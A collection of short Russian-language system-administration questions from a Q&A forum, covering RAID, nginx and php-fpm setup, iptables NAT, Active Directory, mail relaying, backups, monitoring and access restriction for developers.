1. Можно ли поставить другой SCSI диск, причем другого объема (больше, чем остальные)?

2. Можно ли поставить диск со скоростью шпинделя в 15 тыщ.об./мин., если все диски в массиве имеют 10 тыщ.об./мин.?

iremezoff

Доброго времени суток, коллеги!

Есть в винде такая утилита как openfiles, позволяющая локально и удаленно запрашивать список открытых по сети файлов. Но вот в чем проблема, при подключении к удаленной машине список файлов выдается только в контексте подключающегося пользователя.

Возможно ли вообще получить список ВСЕХ открытых файлов на удаленной машине?

baltazorbest

Всем доброго времени суток.


Нужно сделать средствами mikrotik, что бы человек при подключении к роутеру через Wi-Fi при заходе на любую страницу и через любой браузер, был пере направлен на мой веб сервер. Как это можно сделать?


Заранее спасибо.

shanker

Задача: создавать автоматически снимки состояний виртуальных машин. Причём так, чтобы их было не более 5. Если создаётся 6-й то 1-й удаляется.

Подумал сначала сам скриптик написать, но задумался: может, кто-то уже решал подобную задачу?


Хостовая система: Ununtu 12.04

Виртуальные среды: VirtualBox 4.2 и VMware Workstation 9

Lihonosov

Дано: SVN сервер, Jenkins, который собирает проекты из исходников (вытягивает по SVN) и деплоит их на сервера. Чтобы это максимально быстро было, то машина с Jenkins и SVN находится рядом с серверами на которые он деплоит (в датацентре).

Проблема: когда пропадает интернет (укртелеком будь он неладен) работа программистов остановлена, т.к. SVN сервер находится далеко, не локально.

Думаем перенести SVN сервер в офис к програмистам, но тогда возникает вопрос как быть с Jenkins'ом, тоже переносить (т.к. доступа к локальному SVN из датацентра где сейчас стоит Jenkins нет)? Если все перенесем на офис, то процесс деплоя затянется (в связи с малой скоростью отдачи у укртелекома), т.к. нужно будет время на копирование собранных проектов на сервера, которые в датацентре.

Еще один из вариантов — это подключение второго провайдера и настройка шлюза так, чтобы если у одного провайдера отключился интернет, то автоматически поднялся второй.

Поделитесь свои опытом, как устроено у вас.

jbols

Здравствуйте всем!

Есть КД на win 2008 r2. С PowerShell только начал знакомство. Завел из csv больше тысячи пользователей, а вот с созданием папок не получается…

Может, у кого есть наработки? Нужно примерно следующее:

Берется название папки из csv, папка подключается как домашняя к одноименному профилю(или тоже из csv), ей назначается буква диска «Y:»(например), даются права на чтение и запись для Админа, Этого пользователя и определенной группы. Как-то так… А и плюс жесткая квота на 200mb, к примеру…

Заранее спасибо.

moderatorh

Нужно создать следующую ситуацию

1. Нужно сделать Красивоеимя.мойсайт.ру и имякакоебыло.ру зеркальными. Причем если человек зашел или перешел на первое имя, то ходил по его ссылкам, а если на второе, то по его, то есть без главного домена… Как это правильно реализовать на уровне апача? пока в голову приходит только два движка настроенные на разные домены и полное зеркалирование между ними, но вряд ли это оптимальный вариант.

2. Как на подобные вещи поисковики реагируют?

klu4ik

Добрый день, коллеги.


У меня дома стоит ESXi 5 как домашняя лаба и вот через год беспрерывной работы начался сыпаться жесткий диск, на котором полдюжины виртуалок и сам гипервизор. Пока все данные целые хочу переустановить гипервизор на USB-флешку и собрать RAID1, чтобы еще год, два не беспокоится о системе.


Итак, вопрос: какой RAID-контроллер использовать? Хотелось бы что-нибудь простое (до 3000 рублей), но не уверен, что ESXi увидит массив, либо сможет мониторить состояние дисков в массиве.


Что посоветуете?

Namolem

Дома у меня интернет используют 5 компьютеров.

4 сидят в интернете через браузер, мой использует другие сетевые программы.

Компьютеры подключены по проводу и через WI-FI к роутеру Netgiar JWNR2000, который в свою очередь подключен к ADSL роутеру D-Link 2500U

Каким образом можно…?
1. Узнать как загружает канал конкретный компьютер
2. Ограничить скорость для компьютера верхней планкой ХХХ Кбит/сек

dbmaster

С пятницей всех!!!

Мы переехали в облако RackSpace и с ростом количества серверов столкнулись с необходимостью установить VPN.

Можно ли сконфигурировать один сервер и иметь удалённый доступ ко всем серверам в облаке?

Какие существуют решения под ubuntu?

Спасибо

sergiks

На nic.ru пользуюсь своими nginx и php-fpm. Надо, чтобы они запускались автоматом при перезагрузке всего сервера.

Прописал скрипт, который это выполняет, в ~/etc/rc.d/my_start — рядом с их «родными» httpd и nginx. Но пару разу уже была ситуация, когда сервисы мои оказывались выключены. Подозреваю, что не сработал этот автостарт.


Тариф 201, сайты в ручном режиме, веб сервер хостинга выключен.


Подскажите, кто в курсе тонкостей nic.ru, как правильно сделать автозапуск?

iManiacDev

Есть 2 сайта на одном домене, управляется все это дело чистым свежим nginx. В зависимости от значения переменной $var мне нужно выдавать разные версии сайта. Сайты лежат в одной общей директории:

Директория родитель \
Директория родитель \ Сайт1
Директория родитель \ Сайт2

$var принимает значения Сайт1 и Сайт2.

Для одного сайта все понятно, конфиг nginx принимает следующий вид:

server { listen 80; server_name domain.com; root /var/www/Общая директория; index index.php index.html; location / { try_files $uri $uri/ /index.php?q=$uri&$args; } location ~ /index.php { include fastcgi_params; fastcgi_pass unix:/var/run/php5-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } location ~* \.(php|tpl|xml|log)$ { return 403; } }
Как правильно переделать данный конфиг, для решения данной задачи?

shvedovka

Здравствуй %username%,

У нас маленький никому не мешающий сайтик с вполне скромной посещаемостью, отлично живущий на виртуальном хостинге.
Но что-то пошло ни так, и теперь на сайт ломятся с кучи IP.

Посоветуйте варианты решения ситуации.

lexfrei

Начал сейчас разбираться с данной технологией у себя на сервере. Так как тут ничего по сабжу нет (ну почти нет), то свой опыт могу оформить в общеобразовательный пост и обобщённый мануал.

Оно надо или хватит того что есть в википедии?

magnitudo

Приветствую!

Подскажите как разрешить на компьютере выход в интернет ТОЛЬКО для Skype?

Нужно чтобы на компьютере (Windows XP) работал только Skype. Доступ в интернет в организации осуществляется через proxy (какой-то коммерческий типа TrafficInspector). У меня есть полный административный доступ к компьютеру. Можно попросить администратора организации сделать какие-либо настройки на прокси.

wisd

Добрый день.
Разработана программа взаимодействующая с GUI путем снятия скриншотов и нахождением «похожих» элементов с последующим кликом, вводом с клавиатуры и т.д. На Windows 2008 R2 сделали несколько пользователей, запустили программу, но как оказалось при сворачивании RDP или закрытии (без log out), программа не может снимать скриншоты, видимо Windows перестает отдавать данные по GUI (что логично), вопрос, можно ли предотвратить это? Чтобы независимо от того есть подключение к сессии или нет, программа могла снимать скриншоты?

g0lden

Доброго времени дамы и господа!

Возник у меня вопрос на тему сертификации в качестве linux администратора, погуглил, почитал, понял что есть три серьезных варианта: LPI, сертификаты от Red Hat и от Novel.

Собственно теперь требуется узнать:
1) По какому из этих вариантов есть достойные подготовительные курсы и материалы в Москве?
2) Какую сертификацию в дальнейшем можно пройти, не покидая территории России?
3) На какие еще курсы\сертификаты по данной теме стоит обратить внимание?

В качестве цели стоит получение новых знаний, возможность взглянуть на старые под иным углом, ну и бумажка, которая в последствии будет радовать работодателей.

Rendorf

Здравия!

Хочу реселлить облачные сервисы типа exchange, backup. Что можете посоветовать?

Заранее всем спасибо!

SeiFeR

Интересует хостинг, который справится с просмотром 10000 в час по direct-link'ам.

Habrastorage не подходит в силу того, что он автоматически зажимает фотографии до 800PX по ширине. Нужен вариант не менее 1600PX по ширине.

Спасибо за внимание.

dobriykot

Видел мануалы по установке и настройке, но все это надо делать руками, каждый раз ковырять конфиги в случае необходимости. Хочется что-то готовое с веб-интерфейсом/gui, чтобы развернуть на чистом vps. Чтобы после установки пользоваться не командной строкой, если надо внести коррективы в систему, а нормальным интерфейсом. Короче, что-то похожее на панели хостеров, самописные или ту же Cpanel. Чтобы было просто добавить домен, удалить его, настроить поддомены, переадресации, запреты, разрешения, php, mysql, cron, почту и т.п.

Sild

Здравствуйте, есть желание написать свой прокси-сервер, который по запросу с клиентской стороны (клиент так же пишем ручками) переадресоввывал все исходящие запросы через какой-либо сторонний сервер. Клиент указывает протокол и\или порт, и все запросы использующие данные параметры идут в обход до конечной цели.

Итак, с какой целью я создал вопрос?
Во-первых мне бы хотелось у вас спросить — а существуют ли готовые решения? Может мне было бы полезно о них почитать, а то и глянуть исходники. Вполне возможно что есть проекты, частично реализующие мои планы (TOR,SOCKS — те, которые я нашёл. Было бы замечательно в этом ещё разобраться, потому что касательно SOCKS — так в голове полная каша. Вам есть чем ещё поделиться?)

Во-вторых, в качестве ЯП на данный момент я рассматриваю Java, однако обусловлено это только кроссплатформенностью и небольшим опытом работы с ней. Подскажите, насколько это правильный выбор, может есть варианты получше?

Ingtar

Добрый день, уважаемые хабровчане!

Ситуация: разростающаяся фирма и большое кол-во ресурсов, куда человеку предоставляется доступ по мере его работы.

Уследить за учетками пользователя становится очень сложно.

Существует ли некая софтина, которая может выполнять следующие функции:

1) ведение базы данных пользователей вида ФИО, логин, доступ к 1,2,3,4,5 ресурсу.

2) Возможность отписывать где-либо руководителю с просьбой открыть пользователю доступ туда или сюда.

3) сохранение соотвественно этой истории запросов.

4) желательна хоть какая-то процедура авторизации для записи (было бы совсем хорошо — интеграция с АД)


На ум пока приходит SharePoint или просто файлик-табличка с данными.

Существует ли что-либо еще?


Возможность развернуть систему как на Windows, так и на Linux

mrhard

Добрый день!
Наша студия разрабатывает сайты, клиентов накопилось очень много, в основном не очень нагружаемые проекты. Раньше регистрировали их на сторонних хостингах, но теперь есть желание самим оказывать такие услуги.
У нас ИП, вместо серверов хотим использовать VDS, т.е. свой физический сервер пока ставить не собираемся.
Какие лицензии и бумажки нам потребуются? Какие подводные камни могут быть, подскажите кто сталкивался…

baalmor

Всем привет.
После недели мучений я сдаюсь. :)
Мне нужна помощь в настройке связки nginx+php-fpm+freebsd
Конкретнее, у меня проблема с логами ошибок. Они, тупо, не пишутся.
вводные данные таковы.
freebsd 8.3-RELEASE
PHP 5.4.7 (fpm-fcgi)
nginx version: nginx/1.2.4

конфиг FPM
[global] pid = run/php-fpm.pid error_log = log/php-fpm.log log_level = notice emergency_restart_threshold = 5 emergency_restart_interval = 2 process_control_timeout = 2 daemonize = yes events.mechanism = kqueue [puser] listen = /usr/local/www/host/tmp/php-fpm.sock; listen.backlog = -1 listen.allowed_clients = 127.0.0.1 listen.owner = puser listen.group = puser listen.mode = 0666 user = puser group = puser pm = dynamic pm.max_children = 30 pm.start_servers = 2 pm.min_spare_servers = 2 pm.max_spare_servers = 5 pm.max_requests = 50 slowlog = /usr/local/www/host/logs/fpm.log.slow request_slowlog_timeout = 1s rlimit_files = 1024 rlimit_core = 0 chroot = /usr/local/www/host/ catch_workers_output = yes env[HOSTNAME] = $HOSTNAME env[TMP] = /tmp env[TMPDIR] = /tmp env[TEMP] = /tmp php_admin_value[upload_tmp_dir] = /tmp php_admin_value[cgi.fix_pathinfo] = 0 php_admin_value[date.timezone]= 'Europe/Moscow' php_admin_value[memory_limit] = 320m php_admin_value[max_execution_time] = 180 php_admin_flag[log_errors] = on php_admin_value[error_log] = /usr/local/www/host/logs/fpm-err.log (пробовал и по chroot ставить, и просто файл указывал. никаких признаков жизни) php_admin_value[error_reporting] = 'E_ALL & ~E_NOTICE' php_admin_value[display_errors] = off php_admin_flag[display_startup_errors] = off

конфиг nginx
user www; worker_processes 2; worker_rlimit_nofile 80000; error_log /var/log/nginx_error.log notice; #pid logs/nginx.pid; events { worker_connections 2048; use kqueue; } http { server_tokens off; client_max_body_size 4m; include mime.types; default_type application/octet-stream; charset utf-8; sendfile on; keepalive_timeout 65; tcp_nopush on; tcp_nodelay on; log_format IP .$remote_addr.; log_format main '$remote_addr - $remote_user [$time_local] $request $request_body ' '"$status" $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; reset_timedout_connection on; server { listen 80; server_name www.example.com; access_log /usr/local/www/host/logs/access.log main; error_log /usr/local/www/host/logs/error.log error; error_page 500 502 503 504 /errors/50x.html; error_page 404 /errors/404.html; root /usr/local/www/host/htdocs; index index.php index.html index.htm; location / { index index.html index.php; try_files $uri /index.php?$args; } location ~ \.php$ { fastcgi_split_path_info ^(.+\.php)(.*)$; fastcgi_intercept_errors on; fastcgi_pass unix:/usr/local/www/host/tmp/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /htdocs$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_param PATH_TRANSLATED /htdocs$fastcgi_script_name; include /usr/local/etc/nginx/fastcgi_params; } } }

в файле index.php, намеренно допускаю ошибку, например ставлю ' (кавычку) и…
никакой реакции со стороны сервера. Он, конечно, вываливает 500 стандартную ошибку, но во всех логах, кроме access.log вообще нет никаких свидетельств об этом инциденте.
Что я делаю не так?

alexpogodin

Доброго времени суток!

Пытаемся внедрить Capistrano для развертывания релизов на серверах. Все бы хорошо, если бы не праведная паранойя администратора. В связи с этим возникает вопрос: какими средствами правильно ограничить набор разрешенных действий для пользователя, используемого для деплоя. Равно как и список ресурсов файловой системы, к которым пользователь должен иметь (или не иметь) доступ.

В голову приходит всего 2 варианта:
— пляски с ~/.ssh/authorized_keys и command
— AppArmor & SELinux

Интересен опыт коллег в этом плане.

mihavxc

В связи с законом о защите детей сейчас все чаще и чаще можно встретить на сайтах значок +18 или +16(например на Lenta.ru).
Хотелось бы знать есть ли смысл его размещать с точки зрения нашего законодательства.

У нас есть сервис уведомлений о концертах(ActionList.ru), то есть по сути это просто афиша, но можно встретить группы типа «х*й забей» + пользователи могут оставлять комментарии. Есть ли смысл ставить значок возрастного ценза. А если его в подвале разместить?

alexk24

Хочу настроить мониторинг состояния RAID контроллеров Adaptec 5805 в Nagios. Для этого требуется получать состояние массивов, самого контроллера (а ну как перегрелся), ну и возможно статистику в любом виде подвергающемся дальнейшей обработке. Серверов с такими контроллерами несколько и на них стоит гипервизор VMware ESXi 4.1.


Единственное решение которое я на данный момент нашел, это установить драйвера с сайта Adaptec'а и в дополнение его же CIM Provider, после этого появляется возможность удаленного мониторинга с помощью «RemoteARCCONF». К сожалению от обычного arcconf он отличается странностями авторизации и указанием хоста с которого брать данные — они записывается в конфиг файл при инсталляции и в последствии работа идет уже с этими данными.


На данный момент единственное, что возможно предпринять, это вести опрос с помощью RemoteARCCONF и обвязки из скрипта который предотвращает запуск еще одного RemoteARCCONF и подменяет ему конфиг файл.


Такое решение мне не особо нравится, но может кто-то уже сталкивался с данной задачей и нашел более правильное решение?


Если более красивого решения не найдется — имеет ли смысл описывать велосипед из «RemoteARCCONF» и обвязки статьей на хабре?

RUVATA

Я понимаю что, вопрос такой вроде надо на спец-форумах задавать… но не поверите :) я задавал: OSzone1, OSzone2, SysAdmins.ru
И тишина, прям таки совсем тишина… ну попробую «поискать счастья» здесь…
Суть вопроса:
При ковырянии групповых политик, одной из манипуляций было попробовать внести некоторые изменения в Default Domain Policy (которая на тот момент была отключена, неизвестно зачем «архитектор сия сети канул в лету» :) ) Контроллером домена выступает Windows Server 2003 R2, он же DHCP-сервер.
На следующий день, после того как политика Default Domain Policy была активирована — все перезагружавшиеся рабочие станции под управлением Windows 7 Pro перестали принимать параметры от DHCP-сервера, не опознают сеть подключения («Неопознанная сеть» со всеми вытекающими), помог разобраться вот этот пост (да, я там тоже спросил :) ), только выводить из домена оказалось необязательно, достаточно зайти под любым локальным админом и сбросить политики
secedit /configure /cfg %windir%\inf\defltbase.inf /db defltbase.sdb /verbose
… Само собой Default Domain Policy снова отключена… побегать пришлось неплохо — «семерок» более двадцати.
Работоспособность семерок востановлена, но мне хочется знать что-же это все таки за такая политика, которая приводит к таким печальным для семерок последствиям, ведь рабочие станции Windows XP при этом работали отлично.
Какие у коллективного разума будут соображения?

PS: Я не админ, короче мотороллер не мой и т.д.
Но разобраться надо :)

bRUtality

Прошу помочь советом уважаемое хабросообщество.
Стоит такая задача: следить за папкой на предмет появления новых файлов. Т.е. как только в папке появляется новый файл, запускаем скрипт на копирование этого файла в локальную папку. Ньюанс в том, что папка находится на удаленном сервере, и доступ туда по ftp. Реализуемо ли это в принципе (в средствах практически не ограничен)?
Заранее спасибо всем откликнувшимся.

lmaxximl

Доброе утро хабрсообщество. Внес вопрос в хаб 1С-Битрикс, но понимаю что не туда, нет отдельного Хаба 1С Предприятие.

Вопрос в следующем.
На предприятии поднимаем 1С v8 Документооборот, есть там такая функция как «легкая почта». Мы работаем с почтой Gmail. Связь с интернетом проходит следующим образом Router на Linux — UserGate для контроля трафика. Столкнулись с проблемой, когда в UG пробрасываем порты до Gmail почтовые программы работают и почта приходит/уходит. Чего не сказать о функции легкой почты в 1С Документооборот, хотя настраиваем так же как и почтовую программу выскакивает ошибка при проверке настройки почты:

При соединении произошла ошибка: {ОбщийМодуль.Почта.Модуль(159)}: Ошибка при вызове метода контекста (Подключиться) Соединение.Подключение(профиль); по причине: Соединение закрыто сервером.

Использование утилиты stunnel из соображений информационной безопасности не допускается.

Более детально могу сказать следующие:

Связка почтовая программа — настройка Gmail через прокси UG и проброс портов — Интернет — работает
Связка Модуль Почты в 1С Документооборот — настройка Gmail через прокси UG и проброс портов — Интернет — неработает

Связка почтовая программа — настройка Mail.ru через прокси UG и проброс портов — Интернет — работает
Связка Модуль Почты в 1С Документооборот — настройка Mail.ru через прокси UG и проброс портов — Интернет — работает

При использовании утилиты stunnel:
Связка Модуль Почты в 1С Документооборот — настройка Gmail через Stunnel и проброс портов — Интернет — работает

Из всего этого понятно следующее: Почтовый клиент настроенный через прокси UG шифрует сообщение и спокойно отправляет его на сервер, Модуль почты в 1С Документооборот настроенный через stunnel отправляет сообщение в stunnel там шифрует и отправляет на сервер, Модуль почты настроенный через прокси UG не шифрует сообщение и не может достучаться до сервера. Значит проблема в Модуле почты 1C Документооборот.

Ну вот как то так, если что не понятно могу в комментариях все объяснить задавайте вопросы.

danielnewman

Лежит на сервере-хосте горка KVM-гостей, гости ломятся через 80-й порт наружу, что бы получить апдейты пакетов rpm/yum..., вытянуться curl и т.д. Но все эти запросы запиливаются к локальному http­-серверу по ряду причин в iptables хост-машины:
iptables -t nat -I PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.10.10.110:80
Это выглядит как-то так:

+----------------------------+ | Debian KVM-Host | iptables -t nat -I PREROUTING -p tcp \ | eth0: 5.5.5.5 | --dport 80 -j DNAT --to-destination 10.10.10.110:80 | vmbr1: 10.10.10.1 | +--------+-------------------+ | +--------+------------+ | nginx 10.10.10.110 | +---------------------+ | | | | | | +---------------------+ | | +----| Guest1 10.10.10.123 | | | +---------------------+ | | +---------------------+ | +---| Guest1 10.10.10.122 | | +---------------------+ | +---------------------+ +---| Guest1 10.10.10.121 | +---------------------+

Допустим, дергаю я wget yandex.ru с Guest3 10.10.10.123, а у меня в nginx-прокси на 10.10.10.110 все запросы незнакомые перенаправляются на Guest2 10.10.10.122, а на нем — Plesk, и вот мне этот самый плеск сообщает, что страница по умолчанию для этого сервера… и отдает мне её. Да и сам 10.10.10.110 все попытки выйти из сети, согласно правилу хост-машины, через себя пропускает и на 10.10.10.122 взад шлет. Сами интернет-адреса правильно ресолвятся (другие порты), но кого это интересует.

Так вот, как «разлупить» мне эту ситуацию — не вразумею. Помогите, пожалуйсталюдидобрые, с таким правилом, что бы все внешние адреса !10.10.10.0/24 слались через NAT и во вне хост-машины.

4udik

Есть КД на win server 2008 r2, есть клиенты на win 7. При входе в домен пользователю на комп подгружается его профиль с рабочим столом и прочим. Групповые политики настроены так, что удаляют локальные профили после суток простоя, таким образом локальных пользователей на компьютерах нет.
В связи с временной нестабильностью сети возникла необходимость разрешить пользователям домена входить на свои компьютеры при отсутствии сети. Сейчас убираю в групповых политиках удаление профилей и разрешаю вход с локальных учеток, соответственно, если пользователь хоть раз заходил под учеткой на комп, она сохраняется и дает ему возможность зайти в систему без сети (само собой у него будет черный рабочий стол и все его файлы отсутствуют).
Собственно вопрос: что будет происходить с данными при повторном подключении к домену — затирается ли что-то? обновляются? игнорируется локальный профиль? И можно ли это где-то настраивать.
И второй — есть ли варианты для экстренного входа пользователей на комп получше этого?

2king2

Необходимо найти площадку для хостинга «платежной системы». Система состоит из сервера приложений (Java и Apache tomcat) и сервера баз данных (Oracle 11g). Так как система связана с финансами, то нужна высокая надежность и доступность. Поделитесь опытом, где лучше разметить систему в облаке или арендовать сервера в дата-центре и нанимать админов для построения кластера. Пожалуйста, выскажите все «ЗА» и «ПРОТИВ». Спасибо!

pacahon

Необходимо осуществить перевод статики проекта (css/js/images) на поддомен cdn..com с помощью nginx. С логической точки зрения мне видится всё просто:
1. Создаю поддомен в конфиге
2. Меняю на сайте адрес статики
Проблема в том, что могу не учесть все места с выводом статики, поэтому хотелось бы перестраховаться.
Вопрос: религиозно ли верно будет точки зрения сео сделать 301й редирект в nginx для статики? Т.е. у меня сейчас есть стандартный location для статики, вот туда я засуну редирект на cdn..com И обязательно ли сразу убивать обработку статики на основном домене (не будет ли это считаться дублем)?

Qwofer

Добрый вечер.

Совсем недавно у меня отвалился сайт написаннный на Asp.NET MVC 3. В ответе хостинга было сказано, что превышен порог CPU 20%.

Дело в том, что каждые три дня любого месяца на сайте идет резкий скачок посещаемости.

А у меня в коде был написан сущий бред и получалось, что за время сеанса конкретного пользователя генерировалось 3 временных файла ( GetTempFileName() ). Я не удалял временный файл после работы с ним в методе.

Но меня смущает описание возникшей проблемы. Я предполагаю, что именно в файлах и заключался траббл, но при чем тут тогда 20% CPU?

Подскажите пожалуйста, это на самом деле была виновата GetTempFileName()?

SlavikF

В LAN есть несколько компьютеров. Все подключены к раутеру (OpenWRT), и через него выходят в Интернет.
IP адрес динамический.
Один компьютер работает, как NAS и как веб-сервер, FTP-server… Вот его надо сделать доступным из Интернета.
Вот тут есть схема раутера:
wiki.openwrt.org/toh/buffalo/wzr-hp-g300h

Там есть инструкции, как выделить порт для DMZ, но все инструкции создают новые VLANs и блокируют доступ между LAN и DMZ устройством. В общем-то это и есть настоящий DMZ.

А я хочу, чтобы все компьютеры были в одной LAN, и свободно контачили между собой.

Я вроде понял, что для этого нужно пользовать iptables, но никак не могу разобраться в синтаксисе.

Ну и как вторая часть этой задачи — нужно, чтобы обращаться у этому компьютеру можно было бы как из локалки, так и из Интернета по одному и тому же адресу, но это можно наверное сделать через DNSMASQ, и я уже сам допилю.

Alexufo

Если поставить две SSD в рейд для пущей надежности. Есть ли смысл делать из ноута сервер?
Один минус — в охлаждении. С питанием и размерами это очень заманчиво.
Предполагается использовать для внутренних целей без больших нагрузок в трафике.

danielnewman

Собственно %сабж%. Есть пока что виртуальный кластер из 8-и машин на CentOS и Debian, которые переодически апдейтятся и апргейдятся из официальных репозиториев и их зеркал. Плюс чуточка «пользовательского» софта. Вроде и апдейтить — всего ничего, по чуть-чуть, но умножив это «чуть-чуть» на весь зооПарк, получается Цифра.


При каком зоопарке (количество машин) стоит заморачиваться на локальный репо и какие варианты тут могут быть?

Mirgorod

Здравствуйте, у меня есть схема, по которой необходимо создать таблицу маршрутизации. Поиски в Интернете не привели ни к чему. Возможно и было то, что может мне помочь, но я не системный администратор, я программист-фрилансер.

В общем схема вот:


Если вам будет не сложно, пожалуйста, объясните чайнику что к чему и что почитать, чтобы разбираться в том, как создавать такие таблицы.

danielnewman

В старой конфигурации web-сервера (до переезда) стоял Plesk с локальным BIND'ом. Понимаю, что если бы была необходимость в ресолвинге доменных имен, и публичный IP-адрес сервера был прописан в A-записях доменов, то сервер, получив запрос… Постойте-ка, ну а в чем тогда смысл прописывания зависимостей Имя-〉Адрес/Папка в Apache и nginx? Разве это не одно и тоже? Разве это не ресолвинг?

Сейчас все свои домены, обслуживающиеся у Hetzner, я прописал на NS самого Hetzner. Прописанный сервер сам проксирует запросы на машины с соответствующими сервисами. Зачем же мне держать дублирующие записи на локальном BIND? Какие могут быть цели у такого дублирования и что я потеряю, удалив локальный BIND?

homm

Обновил на сервере Убунту с 11.04 до 12.10. Сразу после первой перезагрузки (т.е. еще на версии 11.10) не запустились некоторые сервисы. Не запустились они и на 12.10. Вручную командой service запускаются нормально, при загрузке системы никак.

Конкретнее, это сервисы: nginx, mysql, php5-fpm, redis-server, exim4, django. Т.е. все, что не идет с системой по-умолчанию.

Для каждого из них запустил update-rc.d defaults && update-rc.d enable

Все они есть в /etc/init.d/.

Что еще можно посмотреть?

kabachok

Есть мать Supermicro c RAID контроллером на Intel ICH10R.

Сдох диск, решил замутить RAID и купил два WD RE4.

И вот думаю теперь, отключать на них TLER т.к. типа он на софтрейдах вреден, или оставить?

foxmuldercp

Приветствую.
Сейчас занимаюсь полной реорганизацией ИТ инфраструктуры в компании
сразу хочу всё документировать, но пока кроме MS Visio не вижу вариантов, как можно описать множественные зависимости систем и сетей.
Например:
Есть домен контроллер, это виртуальная машина, поэтому зависит от такого-то гипервизора 1.
Гипервизор один зависит от упс 1, который зависит от ввода 1 и упс 2, который зависит от ввода 2.
есть файловый сервер, который живет на гипервизоре 2 и зависит от него и от корзины 1, которая подключена к нему через коммутатор 1(упс 3), которая зависит от упс 3(ввод 2) и так далее и тому подобное по всей сети.

В сторону каких названия или классов софта гуглить, если есть готовое?

По мониторингу понятно, тот же нагиос еще несколько лет назад научился строить зависимости — если лежит коммутатор такой-то, то такие-то сервисы не доступны и пищать на аварию на них нет смысла. (Заббикс но вроде тоже умеет)

PS — хаба про документирование не нашел, поэтому посчитал вставить в три три хаба

Спасибо за подсказку и помощь.

tmikwid

Дорогие хабровчане,

У меня проблема — помогите, пожалуйста.
Есть vps-сервер Ubuntu 12.04, на нем хостятся несколько сайтиков. Сайтики на wordpress. Раньше почта для них ходила при помощи msmtp, для него был прописан Google Apps Mail аккаунт с аутентификацией и т.п.

Появилась необходимость отправлять почту с каждого сайтика отдельно, от каждого отдельного адреса. Для этого был снесен msmtp и установлен Exim4 только для отправки писем. При этом происходят чудеса — из командной строки письма уходят — при помощи
echo "This is a test." | mail -s Testing mail@example.com
а вот при помощи
/usr/sbin/sendmail -t -i Test > Test > EOT
почта фризится и в логах Exim пишется: unroutable address, соответственно, почта не уходит.
Подскажите, пожалуйста, куда копать?

IIIyT

Здравствуйте господа!


Есть такая проблема:


— Есть достаточно большое количество dedicated и vds, которые арендованы у разных хостеров и ДЦ

— Есть большое множество проектов и сервисов, которые крутятся на серверах (чаще всего несколько сервисов и проектов на одном)


Необходимо организовать систему для контроля и учёта серверов и проектов, а также для создания бекапов.

То есть нужна система которая мониторит состояние серверов (хотя бы on/off), можно описывать сервер (местоположение, название) добавлять кастомные поля (проекты, сервисы — если бы было возможным мониторить их состояние было бы вообще круто), а также вести учёт пользователей на каждом сервере и хранить их логины пассы (в pgp контейнерах). Ну или что-то похожее. Если бы там ещё была система бекапа, было бы просто супер.


Написано очень сумбурно и вопрос скорее всего в следующем — как вы учитываете свои сервера, проекты, делаете бекапы и храните информацию о пользователях? Какие сервисы и ПО используете?


Заранее благодраю за ответ.

Dementor

На этих выходных произошел традиционный сезонный шабаш с временными зонами и Киев перешел из зоны +3 в зону +2. Но Сервер это событие проигнорировал. Попробовал воспользоваться командой dpkg-reconfigure tzdata и получил в ответ:

Current default time zone: 'Europe/Kiev'
Local time is now: Tue Oct 30 13:27:10 FET 2012.
Universal Time is now: Tue Oct 30 10:27:10 UTC 2012.

что является неправильным, так как у нас по факту 12:27:10.

Я знаю про команду data, но что-то подсказывает, что после перезагрузки сервера, за которой последует сверка с аппаратными часами и наложение временной зоны, системные часы снова начнут спешить на час.

Как правильно решить данную проблему?

Magnum72

Подскажите пожалуйста, а какие продукты Вы используете для документирования кроссировки оборудования в серверной?
Неужели нет простого продукта и удобного продукта который бы позволил разрисовать размещение оборудования в стойках и шкафах?

Elfet

Пиложение на Symfony2 работает на PHP 5.4 + MongoDB + RabbitMQ.

Какой из облачных сервисов лучше выбрать? Ни с одним из них не работал. Возможно есть какие-либо другие варианты? Интересует облачные хостинги для простого маштабирования.

Elfet

Если ли смысл в использовании Varnish как «reverse proxy» для nginx?


Или сам nginx хорошо справляется как HTTP cache?

Mock

Есть финансовый проект, на 80% готовый. Нужно доработать некий функционал. Доступ к исходникам давать не хочется.

Что придумано на данный момент. Работа через какой-нибудь Тим вьювер на серверной машине, где проект развернут на локалке.

Но как быть с переносом на основной рабочий домен? Ведь в процессе работы на локальном сервере через Тим вьювер вполне может быть что зальется какой-нибудь шелл или будет сделана уязвимость «под себя», чтобы при случае заглянуть в гости и стырить все что можно

Всякие там бумажки об ответственности, договора и так далее — это все фигня и никаких гарантий не дает.

makkl

Привет всем. Не могу найти аналог Microsoft Lync Server. Есть ли подобные? Функционал нужен гораздо беднее — чат и голосовые звонки (возможность групповой конференции). Система FreeBSD. Желательно с одним клиентом под все возможности.

P.S. Больше корпоративный аналог Skype

sopov

Ищу онлайн сервис для долговременного хранения архива электронных документов. В зашифрованном виде и с электронной подписью сотрудника отдавшего этот документ на хранение.

Есть такое?

capt_Rimmer

Доброго времени суток.
На данный момент достался сервер с Freebsd, который выполняет роль и маршрутизатора, и брандмауэра, и прокси-сервера и почтовика. MX запись прописана на этот сервер, почта ходит успешно.
Есть новенький сервер с почти настроенным postfix, который находится в локальной сети.

Хочется, чтобы MX запись оставалась у сервера с sendmail, но при этом вся почта шла из интернета на сервер с postfix и так же уходила в интернет с postfix и всё это через sendmail.
Перевести sendmail в режим SMTP Relay можно через access и mailertable

в access прописать:
IP_address_postfix RELAY
выполнить:
/usr/sbin/makemap hash access < /etc/mail/access
в mailertable прописать:
mydomen.ru smtp:[IP_address_postfix]
выполнить:
/usr/sbin/makemap hash mailertable < /etc/mail/mailertable

Подскажите, как корректно прописать транспорт для postfix и нужно ли что-то ещё у sendmail переделывать для реализации?

d3ZORg

Возможно изложу немного сумбурно, но постараюсь разложить по полкам.

В организацию в скором времени придет новый разработчик стажером. Начальство поставило задачу ограничить доступ разработчика к имеющейся информации в проекте, в частности к содержимому базы данных.

Естественно у него будут доступы к локальным серверам на которых производится тестирование и виртуальная машина на которой собственно ведется разработка.

Интернет в офисе без всяческих ограничений на доступ, залить сферический дамп на файлообменник (которые все непозакрывать) человек из IT-сферы думаю сможет, или на крайний случай воспользуется флешкой (ок. usb можно отключить).

